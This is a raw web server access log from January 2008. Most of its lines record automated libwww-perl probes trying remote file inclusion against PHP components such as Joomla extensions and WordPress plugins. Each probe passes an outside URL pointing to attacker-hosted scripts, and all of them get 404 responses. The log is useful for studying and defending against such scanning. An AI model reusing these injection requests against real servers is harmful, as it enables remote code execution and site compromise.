74.6.20.156 - - [25/Jan/2008:11:32:30 -0800] "GET /tmp/?N=A HTTP/1.0" 200 812 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:11:33:49 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [25/Jan/2008:11:33:49 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:34:41 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:34:44 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:34:46 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:35:11 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.51.202 - - [25/Jan/2008:11:35:25 -0800] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.234.234 - - [25/Jan/2008:11:35:27 -0800] "GET //vwar/admin/?vwar_root=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.98.78.147 - - [25/Jan/2008:11:35:44 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.123.8.115 - - [25/Jan/2008:11:36:28 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.8.115 - - [25/Jan/2008:11:36:28 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.123.8.115 - - [25/Jan/2008:11:36:28 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.137 - - [25/Jan/2008:11:36:57 -0800] "GET /megumi/Necklace/?S=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:11:37:11 -0800] "GET /logs/access_071230.log//errors.php?error=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:11:37:12 -0800] "GET //errors.php?error=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:11:37:12 -0800] "GET /logs//errors.php?error=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:37:22 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:37:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [25/Jan/2008:11:37:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=www.gianvito.it/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:11:38:32 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:11:38:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:11:38:39 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:11:39:43 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:39:55 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:39:56 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [25/Jan/2008:11:39:56 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.beauteelegance.be/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:11:40:10 -0800] "GET /logs/access_071229.log/errors.php?error=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:11:40:10 -0800] "GET /logs/errors.php?error=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:11:40:51 -0800] "GET /logs/access_071230.log/tools/send_reminders.php=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:11:40:52 -0800] "GET /logs/tools/send_reminders.php=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:11:42:28 -0800] "GET /logs/access_071225.log/errors.php?error=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:11:44:07 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.103.159.12 - - [25/Jan/2008:11:44:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:44:13 -0800] "GET /logs/access_071229.log/errors.php?error=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:44:13 -0800] "GET /logs/access_071229.log/errors.php?error=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:44:13 -0800] "GET /logs/errors.php?error=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:44:13 -0800] "GET /logs/errors.php?error=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.225.105.144 - - [25/Jan/2008:11:44:36 -0800] "GET /logs/access_071229.log/tools/send_reminders.php=http://zal.sioru.net/KOMA/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:45:23 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:45:24 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.2.45.165 - - [25/Jan/2008:11:45:24 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:11:45:57 -0800] "GET /logs/access_071229.log//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:11:45:58 -0800] "GET /logs//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.126.172.71 - - [25/Jan/2008:11:47:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dv-media.co.uk//templates/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.87.96.4 - - [25/Jan/2008:11:47:15 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dv-media.co.uk//templates/31337.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:11:48:46 -0800] "GET /logs/access_071230.log//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:11:49:46 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://brmania.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [25/Jan/2008:11:49:57 -0800] "GET /!scaneahttp://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
80.67.27.39 - - [25/Jan/2008:11:49:57 -0800] "GET /logs/!scaneahttp://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:50:30 -0800] "GET /logs/access_071225.log/errors.php?error=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:11:50:37 -0800] "GET /logs/access_071225.log/errors.php?error=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:51:57 -0800] "GET /logs/access.log//wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:51:58 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:51:58 -0800] "GET /logs//wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:52:26 -0800] "GET /logs/access.log//wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:52:26 -0800] "GET //wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [25/Jan/2008:11:52:26 -0800] "GET /logs//wp-content/plugins//mygallery/myfunctions/mygallerybrowserhttp://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:11:53:10 -0800] "GET //full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.7.154 - - [25/Jan/2008:11:53:24 -0800] "GET /logs/access_071225.log//index.php?body=http://www.vpt-niedersachsen.de/forum/templates/subSilver/scape.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.7.154 - - [25/Jan/2008:11:53:30 -0800] "GET /logs//index.php?body=http://www.vpt-niedersachsen.de/forum/templates/subSilver/scape.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [25/Jan/2008:11:55:26 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
202.181.99.12 - - [25/Jan/2008:11:55:27 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
61.220.16.179 - - [25/Jan/2008:11:55:56 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
61.220.16.179 - - [25/Jan/2008:11:55:56 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.22.126 - - [25/Jan/2008:11:56:17 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 817843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:11:58:25 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:11:58:25 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:11:58:26 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.162.162.251 - - [25/Jan/2008:11:58:54 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://everybodyrateit.com/robot.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:12:02:52 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:12:02:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.252.72 - - [25/Jan/2008:12:02:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://stokt.com//mojok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.47.31 - - [25/Jan/2008:12:02:55 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.dv-media.co.uk//templates/bda.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:12:03:20 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:12:03:56 -0800] "GET /logs/access_071229.log//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:12:03:56 -0800] "GET /logs//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:12:04:44 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [25/Jan/2008:12:04:44 -0800] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://theninjalegion.com/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.107 - - [25/Jan/2008:12:05:03 -0800] "GET /funny/?N=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [25/Jan/2008:12:07:53 -0800] "GET /logs/access.log HTTP/1.0" 200 366248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.16.96.219 - - [25/Jan/2008:12:08:14 -0800] "GET /logs/access_071230.log//full.php/language/lang_english/user.php?GALLERY_BASEDIR=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.35.179 - - [25/Jan/2008:12:08:55 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:12:11:14 -0800] "GET /logs/access_080106.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:12:11:14 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [25/Jan/2008:12:11:14 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [25/Jan/2008:12:13:10 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:12:14:18 -0800] "GET /logs/access_080106.log/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:12:14:18 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.202.20 - - [25/Jan/2008:12:14:18 -0800] "GET /logs/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.xxxfilmmaking.com/error.txt?http://www.xxxfilmmaking.com/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.81 - - [25/Jan/2008:12:14:34 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:12:15:28 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:12:15:29 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.77.94.81 - - [25/Jan/2008:12:15:29 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://lorder.sitesled.com/idasc???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:05 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:09 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:09 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:20 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/img_library.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:20 -0800] "GET /include/inc_ext/spaw/dialogs/img_library.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.253.97.8 - - [25/Jan/2008:12:16:21 -0800] "GET /logs/include/inc_ext/spaw/dialogs/img_library.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:16:40 -0800] "GET /logs/access_080101.log/config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:16:41 -0800] "GET /config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.23.27.5 - - [25/Jan/2008:12:16:42 -0800] "GET /logs/config.php?fpath=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.31 - - [25/Jan/2008:12:21:03 -0800] "GET /tmp/sess_7c5194cf5c81d817305bdfda508754f6 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.7.80 - - [25/Jan/2008:12:21:13 -0800] "GET /logs/access_071020.log HTTP/1.0" 200 15561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:12:22:20 -0800] "GET /logs/access.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.64.178 - - [25/Jan/2008:12:22:21 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:32 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:32 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:33 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:33 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:33 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.171.105.130 - - [25/Jan/2008:12:22:33 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alcohol114.com/dboard/files/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.215.18.162 - - [25/Jan/2008:12:24:41 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [25/Jan/2008:12:24:52 -0800] "GET //modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
